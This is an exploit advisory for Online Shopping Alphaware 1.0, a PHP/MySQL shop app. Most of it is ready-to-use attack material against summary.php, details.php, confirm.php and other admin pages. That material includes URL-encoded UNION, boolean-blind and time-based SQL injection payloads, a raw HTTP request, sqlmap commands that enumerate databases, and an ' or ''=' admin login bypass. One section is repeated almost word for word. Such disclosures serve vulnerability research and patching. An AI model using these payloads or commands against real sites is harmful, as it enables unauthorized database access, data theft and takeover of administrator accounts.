Online Shopping Alphaware version 1.0 suffers from multiple remote SQL injection vulnerabilities. Original discovery of SQL injection in this version attributed to Ahmed Abbas.
204f998c116fde2ccd7e7f83d5a48685
# Exploit Title: Online Shopping Alphaware 1.0 - Multiple SQL Injection Vulnerabilty
# Date: 2020-8-4
# Exploit Author: Edo Maland
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql
# Version: 1.0
# Tested On Windows & Linux Server
-------------------------------------------------------------------------------------------------------------------------------------
# Vulnerable file: summary.php
# Vulnerable parameter :
- tid
# PoC
URL : http://example.com/alphaware/summary.php?tid=1337 [SQLi]
# Burpsuite Requests
GET /alphaware/summary.php?tid=-3488%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7171626a71%2C%28CASE%20WHEN%20%28VERSION%28%29%20LIKE%200x254d61726961444225%29%20THEN%201%20ELSE%200%20END%29%2C0x716b706b71%29%2CNULL%2CNULL--%20- HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (X11; U; Linux x86_64; ja; rv:1.9.1.4) Gecko/20091016 SUSE/3.5.4-1.1.2 Firefox/3.5.4
Cookie: PHPSESSID=tp5rtgrqhq6mtcgrlv2ouo583n
Host: example.com
Accept: */*
Accept-encoding: gzip,deflate
Connection: close
# Payload
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://example.com/alphaware/summary.php?tid=73' AND 4766=4766 AND 'eIaZ'='eIaZ
Vector: AND [INFERENCE]
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://example.com/alphaware/summary.php?tid=73' AND (SELECT 5482 FROM (SELECT(SLEEP(5)))PeLB) AND 'zQKr'='zQKr
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: http://example.com/alphaware/summary.php?tid=-4244' UNION ALL SELECT NULL,NULL,CONCAT(0x7171626a71,0x6573676f5948464d524243677248444168457a566250595976774178415053687041507a69507642,0x716b706b71),NULL,NULL-- -
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL-- -
# Sqlmap
sqlmap -u "http://example.com/alphaware/summary.php?tid=1337*" --dbs --random-agent -v 3
-------------------------------------------------------------------------------------------------------------------------------------
# Vulnerable file: confirm.php
# Vulnerable parameter :
- id
# PoC
URL : http://example.com/alphaware/admin/confirm.php?id=0*[SQLi]
# Payload
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://example.com/alphaware/admin/confirm.php?id=0' AND (SELECT 1002 FROM (SELECT(SLEEP(5)))Yjjs) AND 'uFRa'='uFRa
# Sqlmap
sqlmap -u "http://example.com/alphaware/admin/confirm.php?id=0*" --dbs --random-agent -v 3
-------------------------------------------------------------------------------------------------------------------------------------
# Vulnerable file: details.php
# Vulnerable parameter : id
# PoC
URL : http://example.com/alphaware/details.php?id=1337 [SQLi]
# Payload
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://example.com/alphaware/details.php?id=1337' AND (SELECT 6801 FROM (SELECT(SLEEP(5)))ogoi) AND 'vASd'='vASd
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: http://example.com/alphaware/details.php?id=1337' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71766b7871,0x6350686f52454b775559486d4a456859414a61424a6c724b72624f6d4554555471764a4d724a726f,0x71716b7171),NULL,NULL-- -
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY],NULL,NULL-- -
# Sqlmap
sqlmap -u "http://example.com/alphaware/details.php?id=1337*" --dbs --random-agent -v 3
-------------------------------------------------------------------------------------------------------------------------------------
# Vulnerable file: confirm.php
# Vulnerable parameter :
- id
# PoC
URL :
- http://example.com/alphaware/admin/confirm.php?id=0*[SQLi]
- http://example.com/alphaware/admin/cancel.php?id=[SQLi]
- http://example.com/alphaware/admin/receipt.php?tid=[SQLi]
# Payload
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://example.com/alphaware/admin/confirm.php?id=0' AND (SELECT 1002 FROM (SELECT(SLEEP(5)))Yjjs) AND 'uFRa'='uFRa
# Sqlmap
sqlmap -u "http://example.com/alphaware/admin/confirm.php?id=0*" --dbs --random-agent -v 3
-------------------------------------------------------------------------------------------------------------------------------------
URL : http://example.com/alphaware/admin/
Bypass Login Using SQL on Admin/Member
Logging in with following details:
Username : ' or ''='
Password : ' or ''='